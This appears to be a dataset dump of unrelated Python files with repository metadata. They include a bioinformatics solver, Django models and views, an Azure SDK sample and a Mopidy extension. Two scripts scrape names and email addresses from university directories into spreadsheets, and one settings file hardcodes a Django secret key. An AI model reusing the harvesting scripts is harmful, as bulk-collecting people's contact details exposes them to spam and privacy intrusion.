HAMMER_OUTPUT_FILE = "hammer_output" + str(itr) + ".wav"
MIC_OUTPUT_FILE = "mic_output" + str(itr) + ".wav"
# one channel is 0 and the other is 1.
MICCHANNEL = 1
HAMMERCHANNEL = 0
# this first measurment works when CHUNK 1024*3 but not for 1024*1
FRAMES_PER_SECOND = RATE / CHUNK
# FRAMES_PER_SECOND = 23
BUFFER_FRAMES = FRAMES_PER_SECOND * RECORDING_BUFFER_SECONDS
RECORDING_FRAMES = FRAMES_PER_SECOND * RECORD_SECONDS
print("Input info: ", p.get_default_input_device_info())
stream = p.open(format = FORMAT,
channels = CHANNELS,
rate = RATE,
input_device_index = DEVICE_INDEX,
input = True,
frames_per_buffer = CHUNK,
stream_callback = callback)
frames, hammerFrames, MicFrames, x, y, = [], [], [], [], []
cutoffLine = []
global recording
recording = 0
framesDe = collections.deque()
hammerFramesDe = collections.deque()
micFramesDe = collections.deque()
rmsDe = collections.deque()
hammerRmsDe = collections.deque()
micRmsDe = collections.deque()
xDe = collections.deque()
print("starting stream")
stream.start_stream()
fig = plt.figure()
ax = plt.subplot()
ax1 = plt.subplot()
ax2 = plt.subplot()
ax3 = plt.subplot()
ani = animation.FuncAnimation(fig, animate, interval=25)
plt.show()
stream.stop_stream()
stream.close()
p.terminate()
frames = framesDe
hammerFrames = hammerFramesDe
micFrames = micFramesDe
# writeFile(p, frames, 1, OUTPUT_FILE)
writeFile(p, hammerFrames, 1, HAMMER_OUTPUT_FILE)
writeFile(p, micFrames, 1, MIC_OUTPUT_FILE)
# upload(p, HAMMER_OUTPUT_FILE, MIC_OUTPUT_FILE, hammerFrames, micFrames)
# os.system("aplay " + OUTPUT_FILE)
# os.system("aplay " + HAMMER_OUTPUT_FILE)
# os.system("aplay " + MIC_OUTPUT_FILE)
for i in range(50):
try:
os.remove("*_output*.wav")
except:
pass
POINTS = 4
for itr in range(POINTS):
print("data point " + str(itr))
getData(itr)
|
[
"noreply@github.com"
] |
jesenator.noreply@github.com
|
d7d684df0cf1d3b5514343eb7f53a9abe2d06a2d
|
57e10f6657a9c0ef8ec9659a29f0b467699bbfcf
|
/Chapter 2/BA2C.py
|
fb8476f95eb870196583a66c89a94649a075484e
|
[] |
no_license
|
ShehabAhmedSayem/rosalind
|
b1dcc2c3fbb211d2b7fe5041be3b653b6270ac80
|
699f6ea6a4176f7edec02137446141b131ab737f
|
refs/heads/master
| 2020-04-02T17:55:32.928186
| 2016-03-03T09:38:28
| 2016-03-03T09:38:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,241
|
py
|
""" Find a Profile-most Probable k-mer in a String """
profile_row = {'A': 0, 'C':1, 'G':2, 'T':3}
def read_profile_matrix(fileName):
with open(fileName) as f:
lines = f.readlines()
for i in xrange(0, len(lines)):
lines[i] = lines[i].strip()
data = list(list())
for i in xrange(0, len(lines)):
data.append(lines[i].split())
for i in xrange(0, len(data)):
for j in xrange(0, len(data[i])):
data[i][j] = float(data[i][j])
return data
def pattern_probability(profile, pattern):
probability = 1
for i in xrange(0, len(pattern)):
probability *= profile[profile_row[pattern[i]]][i]
return probability
def profile_most_probable_kmer(dna, profile, k):
start = 0
length = len(dna)
max_probability = 0
most_probable = ''
while start + k <= length:
substr = dna[start:start+k]
probability = pattern_probability(profile, substr)
if probability > max_probability:
most_probable = substr
max_probability = probability
start += 1
print most_probable
if __name__ == "__main__":
data = read_profile_matrix("in.txt")
profile_most_probable_kmer("TGACCTGGATAACAG", data, 6)
|
[
"andrey.rozumnuy@gmail.com"
] |
andrey.rozumnuy@gmail.com
|
b53a79653da1f30b4346d7cee4b0c1ab43348665
|
74167e4c1061b454d1ab1c2140a1fc2f4540ee2e
|
/accounts/models.py
|
fc5a140def7581969baf9c6413966fd5a150517c
|
[] |
no_license
|
Pagante/ProjectCart
|
f72a1a611445f66c1320c0c21e1832d3ecf67a2a
|
4f065a02a8235c6744768328af5c1e103321ed44
|
refs/heads/main
| 2023-06-05T23:53:10.316222
| 2021-06-27T21:47:28
| 2021-06-27T21:47:28
| 380,840,906
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,861
|
py
|
from django.db import models
from django.contrib.auth.models import BaseUserManager,AbstractBaseUser
# Create your models here.
class MyAccountManager(BaseUserManager):
def create_user(self, first_name, last_name, username, email, password=None):
if not 'email':
raise ValueError('User must have an email')
if not username:
raise ValueError('User must have a username')
user = self.model(
email = self.normalize_email(email),
username = username,
first_name = first_name,
last_name = last_name
)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, first_name, last_name, username, email, password):
user = self.create_user (
email = self.normalize_email(email),
username = username,
password= password,
first_name= first_name,
last_name= last_name,
)
user.is_admin = True
user.is_active = True
user.is_staff = True
user.is_superadmin = True
user.save(using= self._db)
return user
class Account(AbstractBaseUser):
first_name = models.CharField(max_length=50)
last_name = models.CharField(max_length=50)
username = models.CharField(max_length=100, unique=True)
email = models.CharField(max_length=100, unique=100)
phone_number = models.CharField(max_length=50)
# required Field
date_joined = models.DateTimeField(auto_now_add=True)
last_login = models.DateTimeField(auto_now_add=True)
is_admin = models.BooleanField(default=False)
is_staff = models.BooleanField(default=False)
is_active = models.BooleanField(default=False)
is_superadmin = models.BooleanField(default=False)
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['username', 'first_name', 'last_name']
objects = MyAccountManager()
def fullName(self):
return f"{self.first_name} {self.last_name}"
def __str__(self):
return self.email
def has_perm(self, perm, obj=None):
return self.is_admin
def has_module_perms(self, obj_module):
return True
class UserProfile(models.Model):
user = models.OneToOneField(Account, on_delete=models.CASCADE)
address_line_1 = models.CharField(blank=True, max_length=100)
address_line_2 = models.CharField(blank=True, max_length=100)
profile_picture = models.ImageField(upload_to='userprofile', blank=True)
city = models.CharField(blank=True, max_length=50)
state = models.CharField(blank=True, max_length=50)
country = models.CharField(blank=True, max_length=50)
def __str__(self):
return self.user.first_name
def fullAddress(self):
return f'{self.address_line_1} {self.address_line_2}'
|
[
"55301195+Pagante@users.noreply.github.com"
] |
55301195+Pagante@users.noreply.github.com
|
fb58a27373295fd23e4e441d7160e90f57d8c58a
|
9df2fb0bc59ab44f026b0a2f5ef50c72b2fb2ceb
|
/sdk/paloaltonetworks/azure-mgmt-paloaltonetworksngfw/generated_samples/local_rulestacks_create_or_update_minimum_set_gen.py
|
eb4b8b0451f4477d85ec725f4dfa1603454d7a23
|
[
"MIT",
"LGPL-2.1-or-later",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
openapi-env-test/azure-sdk-for-python
|
b334a2b65eeabcf9b7673879a621abb9be43b0f6
|
f61090e96094cfd4f43650be1a53425736bd8985
|
refs/heads/main
| 2023-08-30T14:22:14.300080
| 2023-06-08T02:53:04
| 2023-06-08T02:53:04
| 222,384,897
| 1
| 0
|
MIT
| 2023-09-08T08:38:48
| 2019-11-18T07:09:24
|
Python
|
UTF-8
|
Python
| false
| false
| 1,765
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.identity import DefaultAzureCredential
from azure.mgmt.paloaltonetworksngfw import PaloAltoNetworksNgfwMgmtClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-paloaltonetworksngfw
# USAGE
python local_rulestacks_create_or_update_minimum_set_gen.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
client = PaloAltoNetworksNgfwMgmtClient(
credential=DefaultAzureCredential(),
subscription_id="2bf4a339-294d-4c25-b0b2-ef649e9f5c27",
)
response = client.local_rulestacks.begin_create_or_update(
resource_group_name="rgopenapi",
local_rulestack_name="lrs1",
resource={"location": "eastus", "properties": {}},
).result()
print(response)
# x-ms-original-file: specification/paloaltonetworks/resource-manager/PaloAltoNetworks.Cloudngfw/preview/2022-08-29-preview/examples/LocalRulestacks_CreateOrUpdate_MinimumSet_Gen.json
if __name__ == "__main__":
main()
|
[
"noreply@github.com"
] |
openapi-env-test.noreply@github.com
|
ff0c123b0c7ae8870e5b364be189684c9146de72
|
2da2378855044f3f23f28d67224f0a331ff8ae33
|
/blog/migrations/0005_blog_read_num.py
|
6043f388dfe620be85db31b6eba3221dbef02e2c
|
[] |
no_license
|
Golorcsh/mysite
|
ce6470e34efc749bddf5e371a5b3c7091a507a82
|
5ebbb42d212a8b1cad2cbf3919320b13db66a1d0
|
refs/heads/master
| 2020-05-15T17:40:32.029792
| 2019-05-28T03:09:19
| 2019-05-28T03:09:19
| 182,408,490
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 378
|
py
|
# Generated by Django 2.2 on 2019-04-22 11:16
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0004_auto_20190422_0858'),
]
operations = [
migrations.AddField(
model_name='blog',
name='read_num',
field=models.IntegerField(default=0),
),
]
|
[
"c1045132383@gmail.com"
] |
c1045132383@gmail.com
|
d32afc57ea4aa43077280476b3f715c5706dbaaf
|
73455df4c6185d9c4dc9f1a94c748e4f7ca590d0
|
/fruit/event/event.py
|
97dd069ed3622bee73b05dfd46073e3e07c6101a
|
[
"MIT"
] |
permissive
|
felko/fruit
|
ad54f629af3e41b35371fcda6bd4839b68275535
|
4768fd333ac3b7c0bd6d339304b23e20e312d2d1
|
refs/heads/master
| 2020-12-28T19:24:17.192104
| 2016-05-22T10:38:48
| 2016-05-22T10:38:48
| 59,365,452
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 667
|
py
|
#!/usr/bin/env python3.4
# coding: utf-8
class Event:
"""
Base class of all events.
"""
@classmethod
def from_pygame_event(cls, event):
"""
Interpret a pygame event as a Fruit event.
"""
@staticmethod
def get_event_queue(raw_event):
"""
Return the event queue from a single pygame event.
"""
return _convert_event(Event, raw_event)
def _convert_event(cls, raw_event):
"""
Converts an event from a pygame event to a Fruit event.
"""
if raw_event is not None:
for subcls in cls.__subclasses__():
event = subcls.from_pygame_event(raw_event)
if event is not None:
yield event
yield from _convert_event(subcls, raw_event)
|
[
"skolopedrion@gmail.com"
] |
skolopedrion@gmail.com
|
68107dada2e7dd7dc4eabd477e86ea95d7540946
|
e719bcfde03c0be2c84a7f1e13d12b80fa00ea84
|
/session2/draw_2.py
|
0780ebd4934bca50609387bc0e008130c608d56c
|
[] |
no_license
|
minhduc9699/phamMinhDuc-D4E17
|
53b80e53ff175f0357fb01c9876aa12b343ca060
|
363b61745a206f33c5cfa3532a5abd920fcf4ad1
|
refs/heads/master
| 2023-01-22T08:25:14.210959
| 2020-12-05T04:53:38
| 2020-12-05T04:53:38
| 308,668,542
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 154
|
py
|
from turtle import *
speed(-1)
for edge in range(3, 11):
print(edge)
for i in range(edge):
forward(100)
left(360/edge)
mainloop()
|
[
"minhduc.096.99@gmail.com"
] |
minhduc.096.99@gmail.com
|
efdf49596ac6fb21b807699b0abb2a4f1d012812
|
b41adb2016aa2b290df52157ed1ac39d43f747f2
|
/yalescript.py
|
c18b0fe2a0697e89b0083583ae776090fc3386e4
|
[] |
no_license
|
joannaw516/490
|
cdadbde0b459e2abce6e43bce77af83bb8e7ea63
|
05f3f74016f09b7d603b1fcfa720445c358b8665
|
refs/heads/master
| 2022-05-20T17:44:38.760050
| 2020-04-28T04:35:35
| 2020-04-28T04:35:35
| 256,064,062
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,280
|
py
|
import pandas as pd
import requests
from bs4 import BeautifulSoup
#import pandas for exporting to csv, requests for fetching html, beautifulsoup for parsing html
#using requests to get html from url, and beautiful soup to parse html content
page = requests.get('https://yalecollege.yale.edu/academics/directory-duses-assistants-and-registrars')
soup = BeautifulSoup(page.content, 'html.parser')
#finding main content by id to have access
table = soup.find(id= 'block-yale-college-content')
#find all main headers, the departments
names = table.find_all('h2')
#remove white space from both ends of text
cleannames= [item.get_text() for item in names]
#print(school_list)
#find all email addresses / links
emails = table.find_all('a')
#find all directors and registrars names
text = table.find_all('p')
codirectorsanddirectors = []
emaillist = []
# for x in range(20,220):
# entry = emails[x].get('href')
# if entry == None:
# continue
# if
# print(entry)
#this part was a little janky, there was a lot of variance in the directors-
#some departments had co-directors, some had 1 DUS, some had 2, some had one for the fall and one for the spring
for x in range(2, 202):
entry = text[x].get_text()
#print(entry, x)
#remove empty strings
if entry == '':
continue
if entry[0] == ('D') or entry[0] == ('C'):
#this part was also very janky, i indexed into the emails offset by the few links for the letters at the top of the page
emailaddress= emails[x+18].get('href')
emaillist.append(emailaddress[7:])
#print(entry)
codirectorsanddirectors.append(entry)
#print("codirectorsanddirectors:", codirectorsanddirectors)
#print(text[50].get_text())
#get the text for all of the DUS names
names= [item.get_text() for item in names]
#for x in range(27, 50)
#print(DUSnames)
#exported the emails and names separately from the departments
full_list = pd.DataFrame(
{'DUS': codirectorsanddirectors,
'emails': emaillist
})
departments = pd.DataFrame(
{'departments': names
})
#export to CSV
full_list.to_csv('dus.csv')
departments.to_csv('departments.csv')
#print(emails[27])
#next steps for researching this would likely be to check out ways to web scrape that don't use find_all and scrape a page in chronological order
|
[
"joanna.j.wu@yale.edu"
] |
joanna.j.wu@yale.edu
|
f0757cf64760f87471f7aff2b9859a711f29b54a
|
33d0cafd100b805b34450b9ca4b90015ca3ede50
|
/textutils/textutils/views.py
|
616b2077e84f7650c288b4999620915714ed0ea1
|
[] |
no_license
|
coder-KB/TextUtil
|
4fdcb47c5429dd6abe57e32735cf990269bfae15
|
44aa1bf21bca5ce8d1a05d6767d198d0ed173f4f
|
refs/heads/master
| 2020-09-07T18:12:16.250426
| 2019-11-11T00:57:26
| 2019-11-11T00:57:26
| 220,873,411
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,139
|
py
|
from django.http import HttpResponse
from django.shortcuts import render
def index(request):
return render(request, 'index.html')
def analyze(request):
# Get the text
djtext = request.POST.get('text', 'default')
# Check checkbox values
removepunc = request.POST.get('removepunc', 'off')
fullcaps = request.POST.get('fullcaps', 'off')
newlineremover = request.POST.get('newlineremover', 'off')
extraspaceremover = request.POST.get('extraspaceremover', 'off')
charcount = request.POST.get('charcount', 'off')
#Check which checkbox is on
if(removepunc == "on"):
punctuations = '''!()-[]{};:'"\,<>./?@#$%^&*_~'''
analyzed = ""
for char in djtext:
if char not in punctuations:
analyzed = analyzed + char
params = {'purpose':'Removed Punctuations', 'analyzed_text': analyzed}
djtext = analyzed
if(fullcaps=="on"):
analyzed = ""
for char in djtext:
analyzed = analyzed + char.upper()
params = {'purpose': 'Changed to Uppercase', 'analyzed_text': analyzed}
djtext = analyzed
if(extraspaceremover=="on"):
analyzed = ""
for index, char in enumerate(djtext):
if not(djtext[index] == " " and djtext[index+1]==" "):
analyzed = analyzed + char
params = {'purpose': 'Removed NewLines', 'analyzed_text': analyzed}
djtext = analyzed
if(newlineremover == "on"):
analyzed = ""
for char in djtext:
if char != "\n" and char != '\r':
analyzed = analyzed + char
params = {'purpose': 'Removed NewLines', 'analyzed_text': analyzed}
djtext = analyzed
if(charcount == 'on'):
cnt = len(djtext)
analyzed = f"Total number of characters are {cnt}."
params = {'purpose': 'Removed NewLines', 'analyzed_text': analyzed}
if(removepunc != "on" and fullcaps != "on" and extraspaceremover != "on" and
newlineremover != "on" and charcount != "on"):
return HttpResponse("Error")
return render(request, 'analyze.html', params)
|
[
"noreply@github.com"
] |
coder-KB.noreply@github.com
|
cd46193f2107a70f24bf853229b251e11f09edd3
|
5989e503a733e8b29f4c502008446a75c2b43ff8
|
/src/aids/migrations/0080_auto_20191104_1028.py
|
e61367fa67ca3885c3616e240f880421e5dac253
|
[] |
no_license
|
samuelpath/aides-territoires
|
399a6a7b0607ef5a8d2b327247446b239f5b1a42
|
5793bd49d7157a34e08c29e56a46e1e3ead0651f
|
refs/heads/master
| 2022-12-20T14:35:18.671563
| 2020-08-21T08:00:33
| 2020-08-21T08:00:33
| 288,424,578
| 0
| 0
| null | 2020-08-18T10:27:17
| 2020-08-18T10:27:16
| null |
UTF-8
|
Python
| false
| false
| 389
|
py
|
# Generated by Django 2.2.5 on 2019-11-04 09:28
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('aids', '0079_remove_aid_subvention_rate'),
]
operations = [
migrations.RenameField(
model_name='aid',
old_name='subvention_rate_range',
new_name='subvention_rate',
),
]
|
[
"thibault@miximum.fr"
] |
thibault@miximum.fr
|
33104e73737bbe56ef8c3d00a5ce6c987ad8d4d4
|
0898c718513c9330eae5907f49badcce3ff35a70
|
/excel/bostonPlans/lacrosse.py
|
434b110fc38e4407939612c9b3febbea38b353dd
|
[] |
no_license
|
andrefisch/EvanProjects
|
00035dc0cb99f318e15509b4a8cf7d8995230e08
|
1ab958fd5d7a5d8485e506e60e77756775399579
|
refs/heads/master
| 2021-07-13T11:06:47.475143
| 2018-08-07T23:55:24
| 2018-08-07T23:55:24
| 133,861,990
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,136
|
py
|
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import openpyxl
import re
import pygame, time
xfile = openpyxl.load_workbook('uwlc.xlsx')
sheet = xfile.get_sheet_by_name('2021')
start = 2
end = 102
driver = webdriver.Chrome()
driver.get("https://www.uwlax.edu/info/directory/")
driver.switch_to.frame(0)
for row in range (start, end):
lastName = sheet['A' + str(row)].value
firstName = sheet['B' + str(row)].value
inputElement = driver.find_element_by_id("search_criteria")
inputElement.clear()
inputElement.send_keys(firstName + " " + lastName)
inputElement.send_keys(Keys.ENTER)
html = driver.page_source
p = re.compile('[\w\.]*@\w*uwlax\.edu')
m = p.search(html)
if '<table class="table table-striped color-h" id="resultsTable">' in str(html):
try:
sheet['C' + str(row)] = m.group()
# Keep track of how close we are to being done
print (str(format((row - start) / (end - start) * 100.00, '.2f')) + "%: " + m.group())
except Exception:
pass
xfile.save('test.xlsx')
|
[
"anfischl@gmail.com"
] |
anfischl@gmail.com
|
1b5469bcc3dcfd7fd76a8161c26dc9392a65bff6
|
5409369b91fab5cae896e141acb84add2f5948d9
|
/mopidy_iris/__init__.py
|
e190cb70713d94f543dd0d8d119b4f1072ef272b
|
[
"Apache-2.0"
] |
permissive
|
janza/Iris
|
8c4a6c003f3d782aa9da50b52f8992f521c9ca5a
|
7452c743ba4493f42cb80549710aaf9119e1606d
|
refs/heads/master
| 2021-01-17T08:23:46.823679
| 2017-03-27T13:16:24
| 2017-03-27T13:16:24
| 83,895,941
| 0
| 0
| null | 2017-03-04T13:38:51
| 2017-03-04T13:38:51
| null |
UTF-8
|
Python
| false
| false
| 2,052
|
py
|
from __future__ import unicode_literals
import logging, os, json
import tornado.web
import tornado.websocket
import handlers
from mopidy import config, ext
from frontend import IrisFrontend
from handlers import WebsocketHandler, HttpHandler
from core import IrisCore
logger = logging.getLogger(__name__)
__version__ = '2.13.1'
##
# Core extension class
#
# Loads config and gets the party started. Initiates any additional frontends, etc.
##
class Extension( ext.Extension ):
dist_name = 'Mopidy-Iris'
ext_name = 'iris'
version = __version__
def get_default_config(self):
conf_file = os.path.join(os.path.dirname(__file__), 'ext.conf')
return config.read(conf_file)
def get_config_schema(self):
schema = config.ConfigSchema(self.ext_name)
schema['enabled'] = config.Boolean()
schema['pusherport'] = config.String()
schema['country'] = config.String()
schema['locale'] = config.String()
return schema
def setup(self, registry):
# Add web extension
registry.add('http:app', {
'name': self.ext_name,
'factory': iris_factory
})
# create our core instance
mem.iris = IrisCore()
mem.iris.version = self.version
# Add our frontend
registry.add('frontend', IrisFrontend)
def iris_factory(config, core):
path = os.path.join( os.path.dirname(__file__), 'static')
return [
(r"/images/(.*)", tornado.web.StaticFileHandler, {
'path': config['local-images']['image_dir']
}),
(r'/http/([^/]*)', handlers.HttpHandler, {
'core': core,
'config': config
}),
(r'/ws/?', handlers.WebsocketHandler, {
'core': core,
'config': config
}),
(r'/(.*)', tornado.web.StaticFileHandler, {
'path': path,
'default_filename': 'index.html'
}),
]
|
[
"james@barnsley.nz"
] |
james@barnsley.nz
|
b6cc6b09c13e8614d893dc963a6d721790d09177
|
9b70764296a8144a6e7d0461b9f44b3292b54ddb
|
/Week_4/getRatios.py
|
3400bf5f32ab7d1ff3376cf0abb0ae0adc1eac43
|
[] |
no_license
|
scolon7251/edX_6.00.1x
|
a0d561fdc52d7161c4752a92fc2589c0ab9d7cf4
|
735b19b2cc9ab5dbc3463806e972a6a96e03a874
|
refs/heads/master
| 2020-12-24T14:36:23.169568
| 2015-03-25T23:13:35
| 2015-03-25T23:13:35
| 32,895,207
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 468
|
py
|
def getRatios(v1, v2):
"""Assumes v1 and v2 are lists of equal length of numbers
Returns a list containing the meaningful values of
v1[i]/v2[i]"""
ratios = []
for index in range(len(v1)):
try:
ratios.append(v1[index]/float(v2[index]))
except ZeroDivisionError:
ratios.append(float('NaN'))#NaN = Not a number
except:
raise ValueError('getRatios called with bad arg')
return ratios
|
[
"scolon725@gmail.com"
] |
scolon725@gmail.com
|
bfbb5c0eb21e5ad2b2ad226fbe7a3e9d2d558aef
|
cfa1c211bcd8b5bba82749e5936fd50f619c80af
|
/Hackaton15/settings.py
|
5dba4f251bd83c561e05d4d7dad962b2964270e6
|
[] |
no_license
|
yedtoss/dreamrankings
|
1b9ffee330177c6c00d7922d9179e4cf35336bfd
|
9324fc93afb4a20d51d0ea9ae6ce66d25e9d13b6
|
refs/heads/master
| 2021-01-10T01:06:10.964747
| 2015-11-10T15:06:10
| 2015-11-10T15:06:10
| 45,914,647
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,927
|
py
|
"""
Django settings for Hackaton15 project.
Generated by 'django-admin startproject' using Django 1.8.6.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
PROJECT_PATH = os.path.realpath(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'a3dr_ud59+o3hi8x%8ev36m)@toi8-0w51hf+qp@9$%j9))%vu'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'ranktc',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'Hackaton15.urls'
#TEMPLATE_DIRS = (
# PROJECT_PATH + '/templates/',
#)
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [BASE_DIR + '/templates/'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'Hackaton15.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, "static"),
)
RATING_IMG = os.path.join(BASE_DIR, "static/ratings-img")
|
[
"yedtoss@Aristides-MacBook-Pro.local"
] |
yedtoss@Aristides-MacBook-Pro.local
|
1e838cff1c3206fca261549ede085035a1794d7c
|
b301f5d799fb973f12ff457c94a3fb54f5c6fd6b
|
/pages/views.py
|
56e3848a96f39428eb0488fb6874d562f048fe72
|
[] |
no_license
|
MahmudulHassan5809/DjangoHousingSellingProject
|
ca3a8b9e3d83dd87532b33295e56e50ba7e9576d
|
82d02e04fe2a0cd510f160ad4159f40f4e5779d3
|
refs/heads/master
| 2020-04-09T08:01:41.092034
| 2018-12-03T11:24:13
| 2018-12-03T11:24:13
| 160,179,800
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 852
|
py
|
from django.shortcuts import render,redirect
from django.http import HttpResponse
from listings.choices import price_choices , bedroom_choices , state_choices
from listings.models import Listing
from realtors.models import Realtor
# Create your views here.
def index(request):
#return HttpResponse('Hello');
listings = Listing.objects.order_by('-list_date').filter(is_published=True);
return render(request , 'pages/index.html',{'listings' : listings ,
'state_choices' : state_choices,
'bedroom_choices' : bedroom_choices,
'price_choices' : price_choices,
})
def about(request):
realtors = Realtor.objects.order_by('-hire_date')
mvp_realtors = Realtor.objects.all().filter(is_mvp=True)
context = {
'realtors' : realtors,
'mvp_realtors' : mvp_realtors
}
return render(request , 'pages/about.html',context)
|
[
"mahmudul.hassan240@gmail.com"
] |
mahmudul.hassan240@gmail.com
|
1847478ec8b70f2924f186647354c35f7436bee4
|
d1fa29de428e6df1def8efc33323a4ee8e51074d
|
/s60.py
|
1e52334af47fe5dd53628e2f142f43a45e914afc
|
[] |
no_license
|
Gunasundarinagalingam/positive
|
d0cd729824ebef009d2eced065ec7d81026b69cd
|
4829009c2abd214a58254e555043046117db8562
|
refs/heads/master
| 2020-06-02T15:13:38.476791
| 2019-07-21T15:02:49
| 2019-07-21T15:02:49
| 191,204,498
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 68
|
py
|
num=int(input())
xx=0
while(num>0):
xx=xx+num
num=num-1
print(xx)
|
[
"noreply@github.com"
] |
Gunasundarinagalingam.noreply@github.com
|
99129434172fa0c521b49b6f4febfde4aa1ad958
|
80389757e4222748bb6b1ae84b7519454539fb99
|
/filrefoxFile.py
|
e96b530cb7d706bc9cde450ac8f1394c517e31c6
|
[] |
no_license
|
Prajna14/SeleniumBasics1
|
7c3fe4929eb50cd9d745775e2e62c5d864436667
|
cba0a34222ef24fd1ad54c1b53d8dcbba906b0ad
|
refs/heads/master
| 2020-04-26T12:34:27.447246
| 2019-03-23T12:38:42
| 2019-03-23T12:38:42
| 173,554,180
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 184
|
py
|
from selenium import webdriver
qspiders = webdriver.Firefox(executable_path="C:\\Users\\prajn\\Downloads\\geckodriver-v0.24.0-win64\\geckodriver.exe")
qspiders.get("http://google.com")
|
[
"prajnakornaya14@gmail.com"
] |
prajnakornaya14@gmail.com
|
40fec2d844ff14fbb903f58d6e96f8e46ad3fe8c
|
f83934dd60d4961848c0a86f6d7fbe07b79a1d63
|
/glumpy/graphics/collections/__init__.py
|
c497f742a32eb93341c0ab317f56e2fc37a848d5
|
[] |
no_license
|
brianholland/glumpy
|
2a31e2f5fd039d1debb30dd010ad36c458f329cf
|
a691082385e02db9b1d461847b9e36d8534630fa
|
refs/heads/master
| 2020-12-25T21:43:58.743259
| 2015-11-30T11:04:46
| 2015-11-30T11:04:46
| 46,670,630
| 0
| 0
| null | 2015-11-30T11:04:46
| 2015-11-22T17:10:24
|
Python
|
UTF-8
|
Python
| false
| false
| 951
|
py
|
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) 2014, Nicolas P. Rougier. All rights reserved.
# Distributed under the terms of the new BSD License.
# -----------------------------------------------------------------------------
from . collection import Collection
from . base_collection import BaseCollection
from . path_collection import PathCollection
from . point_collection import PointCollection
from . glyph_collection import GlyphCollection
from . marker_collection import MarkerCollection
from . polygon_collection import PolygonCollection
from . segment_collection import SegmentCollection
from . triangle_collection import TriangleCollection
from . raw_path_collection import RawPathCollection
from . raw_triangle_collection import RawTriangleCollection
from . agg_path_collection import AggPathCollection
from . agg_fast_path_collection import AggFastPathCollection
|
[
"Nicolas.Rougier@inria.fr"
] |
Nicolas.Rougier@inria.fr
|
03fab0a9c754d5052f140abd4b69c247baa784f5
|
acbdf6089c248d1719f95208cbb43a9bcb4a2631
|
/alatool/forms.py
|
cd9bd264f27be45bf682b00d2612a8aa5920e276
|
[] |
no_license
|
yoshi-ashi/alatool
|
0c8aed13565598024181218b3d80de18d75c651f
|
d39cfa9cde9e0a70c54cede5ff4522c73d11e623
|
refs/heads/master
| 2022-12-26T23:15:45.328771
| 2020-09-25T06:42:57
| 2020-09-25T06:42:57
| 296,534,482
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 698
|
py
|
from django.forms import ModelForm
from .models import MatchRecord
from django import forms
class DateInput(forms.DateInput):
input_type = 'date'
class TextAreaInput(forms.DateInput):
input_type = 'textarea'
